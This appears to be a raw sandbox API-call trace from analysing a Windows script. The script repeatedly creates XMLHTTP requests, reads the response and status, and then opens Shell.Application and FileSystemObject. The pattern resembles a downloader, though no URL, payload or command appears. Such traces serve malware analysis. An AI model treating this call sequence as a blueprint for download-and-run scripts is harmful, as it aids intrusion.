	[0403.597] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0403.597] ??2@YAPEAX_K@Z () returned 0x62f330
	[0403.598] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f330) 
	[0403.598] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0403.598] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0403.598] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5ba0) returned 0x0
	[0403.598] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5ba0) returned 0x3
	[0403.598] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0403.598] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0403.598] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0403.598] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0403.598] SysStringLen (param_1=0x0) returned 0x0
	[0403.598] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0403.598] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0403.598] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c50) returned 0x0
	[0403.598] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0403.598] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0403.598] ??2@YAPEAX_K@Z () returned 0x62f310
	[0403.598] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f310) 
	[0403.598] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0403.599] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0403.599] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c50) returned 0x0
	[0403.599] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c50) returned 0x3
	[0403.599] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0403.599] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0403.599] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0403.599] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0403.599] SysStringLen (param_1=0x0) returned 0x0
	[0403.599] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0403.599] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0403.599] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7530) returned 0x0
	[0403.599] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0403.599] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7530, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0403.599] ??2@YAPEAX_K@Z () returned 0x62f330
	[0403.599] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f330) 
	[0403.599] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0403.599] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0403.599] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7530, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7530) returned 0x0
	[0403.599] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7530) returned 0x3
	[0403.600] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7530, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0403.600] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7530, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0403.600] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7530, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0403.600] longjmp () 
	[0403.600] longjmp () 
	[0403.600] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0403.600] SysStringLen (param_1=0x0) returned 0x0
	[0403.600] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0403.600] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0403.600] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5ba0) returned 0x0
	[0403.600] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0403.600] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7208) returned 0x0
	[0403.600] ??2@YAPEAX_K@Z () returned 0x62f310
	[0403.600] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7208, pUnkSite=0x62f310) 
	[0403.600] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0403.600] XMLHTTPRequest:IUnknown:Release (This=0x49c7208) returned 0x0
	[0403.600] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5ba0) returned 0x0
	[0403.600] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5ba0) returned 0x3
	[0403.601] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0403.601] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0403.601] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0403.601] longjmp () 
	[0403.601] longjmp () 
	[0403.601] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0403.601] SysStringLen (param_1=0x0) returned 0x0
	[0403.601] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0403.601] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0403.601] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c00) returned 0x0
	[0403.601] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0403.601] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0403.601] ??2@YAPEAX_K@Z () returned 0x62f330
	[0403.601] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f330) 
	[0403.601] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0403.601] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0403.601] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c00) returned 0x0
	[0403.601] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c00) returned 0x3
	[0403.602] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0403.602] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0403.602] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0403.602] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0403.602] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0403.602] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0404.512] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0404.512] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0404.512] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0404.512] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0404.512] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0404.512] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0404.513] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0404.513] SysStringLen (param_1=0x0) returned 0x0
	[0404.513] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0404.513] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0404.513] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0404.513] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0404.513] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0404.513] ??2@YAPEAX_K@Z () returned 0x62f350
	[0404.513] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0404.513] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0404.513] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0404.513] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0404.513] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0404.514] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0404.514] SysStringLen (param_1=0x0) returned 0x0
	[0404.514] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
